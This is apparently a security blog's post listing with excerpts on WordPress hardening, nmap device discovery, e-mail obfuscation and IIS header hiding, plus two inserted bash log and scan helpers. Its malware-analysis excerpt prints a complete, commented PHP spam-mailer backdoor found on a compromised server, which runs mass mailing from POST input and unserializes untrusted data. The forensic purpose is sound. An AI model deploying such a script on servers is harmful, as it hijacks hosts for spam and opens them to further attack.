Simple CVE: CVE-2018-6389 protection
There’s a DoS problem with the WordPress CMS and it won’t be fixed by its creators. I’ve decided to create a simple, non-intrusive solution for Apache-hosted websites.
Category: Security
How to find network device using its manufacturer name?
I’ve previously posted a note about finding a Raspberry Pi without knowing its IP address. Well, basically it’s the same… Only you need to change the MAC prefix to find another manufacturer. To wrap this up, this is a command to find a device by MAC prefix:
sudo nmap -sP 192.168.100.0/24 | awk '/^Nmap/{ip=$NF}/00:D0:23/{print ip}'
And here you can find actual MAC information (use CTRL+F).
Of course you need Nmap to do that! And sudo is necessary!
Beware that sometimes there might be many prefixes for one manufacturer. Also check the company name precisely; for example, HP is Hewlett Packard but it can also be ProCurve Networking by HP.
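The caveat about several prefixes per manufacturer, as an added example that is not from the original post: a shell function that filters `nmap -sn` output (`-sn` is the current name of `-sP`) against any number of MAC prefixes, case-insensitively. The sample scan output, the `AA:BB:CC` prefix and the function names are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example. Reads `nmap -sn` output on stdin and prints "IP MAC" for every
# host whose MAC starts with one of the prefixes given as arguments.
find_by_oui() {
  awk -v prefixes="$*" '
    BEGIN { n = split(toupper(prefixes), want, " ") }
    /^Nmap scan report for/ {
      ip = $NF
      gsub(/[()]/, "", ip)   # "printer.lan (192.168.100.20)" -> 192.168.100.20
      next
    }
    /^MAC Address:/ {
      mac = toupper($3)      # compare in upper case so 00:d0:23 also matches
      for (i = 1; i <= n; i++)
        if (index(mac, want[i]) == 1) { print ip, mac; break }
    }
  '
}

# Constructed sample of scan output; vendor names are placeholders.
sample_scan() {
  cat <<'EOF'
Starting Nmap ( https://nmap.org )
Nmap scan report for 192.168.100.1
Host is up (0.0011s latency).
MAC Address: 00:D0:23:10:20:30 (Constructed Vendor A)
Nmap scan report for printer.lan (192.168.100.20)
Host is up (0.0020s latency).
MAC Address: AA:BB:CC:01:02:03 (Constructed Vendor A, second prefix)
Nmap scan report for 192.168.100.30
Host is up (0.0031s latency).
MAC Address: 11:22:33:44:55:66 (Constructed Vendor B)
Nmap scan report for 192.168.100.5
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.10 seconds
EOF
}

# Live use (needs root so nmap can read MAC addresses):
#   sudo nmap -sn 192.168.100.0/24 | find_by_oui 00:D0:23 AA:BB:CC
sample_scan | find_by_oui 00:d0:23 aa:bb:cc
```

The scanning host itself (192.168.100.5 in the sample) has no MAC line in the output, so it is never matched.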
Fastest way to find if your WordPress has known vulnerabilities
There is a nice little tool known as WPScan.
How to scan your network for WannaCry vulnerability (SMBv1 MS17-010)?
This tutorial is for Linux systems, especially Debian derivatives.
Hunt for scammer
This is a brief history of a scammer hunt that I’ve conducted today with my buddy from work.
How to obscure your WordPress version and troll the attacker a little…
One of my company’s WordPress installations has been hacked by Turkish hackers recently. After a quick investigation I’ve found that the script version was a little bit old (not a very popular website, mea culpa, not updated very often). In case you didn’t know, WordPress is bundled with a readme file by default. I’ve found that malicious scripts or people use that to determine your version’s branch. So I’ve decided to troll them a little bit…
How to setup pushover alert on logon event in Windows
In this post I’ll show you how to configure Pushover with Windows server. In this specific case it will notify you when someone logs onto your machine.
Simplest way to obfuscate e-mail address using jQuery
Here is the simplest jQuery code to protect e-mail addresses on your website from spam bots. Just put this in a script tag in the head section:
$(window).on('load', function() {
    // anti spam: turn each placeholder span into a mailto: link
    var r = 'random-string';
    $('.' + r).each(function() {
        var $this = $(this),
            value = $this.text();
        // restore the real address by replacing the [random-string] marker with @
        value = value.replace('[' + r + ']', '@');
        $this.replaceWith($('<a></a>').text(value).attr('href', 'mailto:' + value));
    });
});
Now replace random-string with any truly random set of characters, e.g. dhhIDu338
And here is the HTML part. Publish every e-mail address on your page using this code:
Contact: <span class="random-string">johndoe[random-string]mail.com</span>
How to remove unwanted HTTP Response Headers in IIS 7.5
Hiding server software is one of the ways to protect your services from hackers. It’s quite easy to obscure IIS identity. In a few steps I’ll show you how to accomplish this task on the WIMP stack.
PHP malicious code analysis no. 1
I found this piece of PHP malware code on a compromised web server that I started to administer. Its name was a random character string, e.g. acbjxuu.php. There were about 20 more scripts of this kind. It’s a rather simple script for spamming purposes. For your understanding I’ve written what it’s doing in comments between the code lines.
if (isset($_POST['task'])) {
    // be sure to display all PHP errors
    error_reporting(E_ALL);
    ini_set('display_errors', TRUE);
    // disable default PHP memory limit
    ini_set('memory_limit', '512M');
    // disable PHP execution time limit
    set_time_limit(0);
    ini_set('max_execution_time',0);
    ini_set('set_time_limit',0);
    // get serialized array from POST var named task
    // example array structure: array(array('to'=>'[email protected]', 'msg'=>'message content', 'subj'=>'Message subject ex. cheap cialis :)'));
    $x = unserialize(base64_decode($_POST['task']));
    // if task variable was wrongly serialized, just die silently...
    if ($x==false) {exit();}
    $send_from = base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
    // now send half a million of viagra & cialis related mails...
    foreach ($x as $arr) {
        echo $arr['to']."\r\n";
        $arr['msg'] = str_replace('[send_from_url]',$send_from,$arr['msg']);
        mail($arr['to'],$arr['subj'],$arr['msg'],"MIME-Version: 1.0\r\nContent-type: text/html; charset=windows-1251\r\n");
    }
    exit('SEND OK');
}
I’ll look in logs for IP addresses that tried to reach these scripts. Maybe I’ll find something interesting. Wish me good luck and monitor your webserver contents!
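One way to do the log check mentioned above, as an added example that is not part of the original post: count POST requests per client IP to the dropped script names in a combined-format access log. The log lines, the second file name `qzkfwpe.php` and the function names are constructed; the script only acts on POST and echoes every recipient address, so the summed response bytes hint at how large the submitted batches were.

```shell
#!/usr/bin/env bash
# Added example. Reads a "combined" format access log on stdin; arguments are
# the file names of the scripts found on disk.
# Output columns: POST count, total response bytes, client IP, request path.
post_hits_by_ip() {
  awk -v names="$*" '
    BEGIN { n = split(names, a, " "); for (i = 1; i <= n; i++) bad[a[i]] = 1 }
    $6 == "\"POST" {                 # the mailer ignores anything but POST
      path = $7
      sub(/\?.*/, "", path)          # drop any query string
      file = path
      sub(/.*\//, "", file)          # basename of the requested path
      if (file in bad) {
        k = $1 " " path
        hits[k]++
        bytes[k] += $10              # body grows with the recipient list
      }
    }
    END { for (k in hits) print hits[k], bytes[k], k }
  ' | sort -k1,1nr -k3,3
}

# Constructed log lines (documentation IP ranges, made-up paths and sizes).
sample_log() {
  cat <<'EOF'
203.0.113.7 - - [12/Mar/2015:02:10:01 +0000] "POST /images/acbjxuu.php HTTP/1.1" 200 48211 "-" "-"
203.0.113.7 - - [12/Mar/2015:02:10:09 +0000] "POST /images/acbjxuu.php HTTP/1.1" 200 47990 "-" "-"
198.51.100.23 - - [12/Mar/2015:02:11:30 +0000] "POST /cache/qzkfwpe.php?x=1 HTTP/1.1" 200 0 "-" "-"
192.0.2.15 - - [12/Mar/2015:02:12:00 +0000] "GET /images/acbjxuu.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.0.2.15 - - [12/Mar/2015:02:12:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
EOF
}

# Live use (log path is an assumption, adjust to your server):
#   post_hits_by_ip acbjxuu.php qzkfwpe.php < /var/log/apache2/access.log
sample_log | post_hits_by_ip acbjxuu.php qzkfwpe.php
```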